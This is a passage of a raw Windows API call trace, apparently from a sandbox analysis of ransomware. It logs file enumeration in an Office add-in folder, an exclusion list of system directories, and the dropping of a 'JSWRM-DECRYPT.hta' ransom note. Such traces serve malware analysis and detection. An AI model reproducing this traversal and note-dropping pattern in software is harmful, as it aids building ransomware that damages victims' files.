ftCreationTime.dwLowDateTime=0x670f8d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.415] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.415] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x670f8d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.416] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0123.416] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6cde4ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6cde4ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6cde4ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c2b0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="System.Spatial.NetFX35.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2=".") returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="..") returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="...") returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="windows") returned -1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="recovery") returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="perflogs") returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="documents and settings") returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="system volume information") returned 1 [0123.416] lstrcmpiW (lpString1="System.Spatial.NetFX35.dll", lpString2="msocache") returned 1 [0123.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Spatial.NetFX35.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Spatial.NetFX35.dll", cchWideChar=26, lpMultiByteStr=0x240f20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System.Spatial.NetFX35.dll", lpUsedDefaultChar=0x0) returned 26 [0123.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Spatial.NetFX35.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Spatial.NetFX35.dll", cchWideChar=26, lpMultiByteStr=0x240fe8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System.Spatial.NetFX35.dll", lpUsedDefaultChar=0x0) returned 26 [0123.416] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d2b978, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5bea0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="System.Web.Mvc.dll", cAlternateFileName="SYSTEM~2.DLL")) returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2=".") returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="..") returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="...") returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="windows") returned -1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="recovery") returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="perflogs") returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="documents and settings") returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="system volume information") returned 1 [0123.416] lstrcmpiW (lpString1="System.Web.Mvc.dll", lpString2="msocache") returned 1 [0123.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Web.Mvc.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0123.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Web.Mvc.dll", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System.Web.Mvc.dll", lpUsedDefaultChar=0x0) returned 18 [0123.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Web.Mvc.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0123.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="System.Web.Mvc.dll", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System.Web.Mvc.dll", lpUsedDefaultChar=0x0) returned 18 [0123.417] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1860d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="th", cAlternateFileName="")) returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2=".") returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2="..") returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2="...") returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2="windows") returned -1 [0123.417] lstrcmpiW (lpString1="th", lpString2="recovery") returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2="perflogs") returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2="documents and settings") returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2="$RECYCLE.BIN") returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2="system volume information") returned 1 [0123.417] lstrcmpiW (lpString1="th", lpString2="msocache") returned 1 [0123.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\th\\jswrm-decrypt.hta")) returned 0xffffffff [0123.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\th\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.419] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.419] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.420] CloseHandle (hObject=0x338) returned 1 [0123.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\th\\jswrm-decrypt.hta")) returned 0x20 [0123.420] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\th\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1860d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4038a745, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232240 [0123.420] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.420] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1860d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4038a745, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.420] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.420] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.420] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4038a745, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4038a745, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4038a745, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.421] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.421] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.421] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.421] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.421] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.421] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.427] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x36040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.427] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.428] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1860d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1860d8a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1860d8a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x46040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.428] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.428] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc6040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.428] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.429] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.429] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.429] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.429] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.429] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.429] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 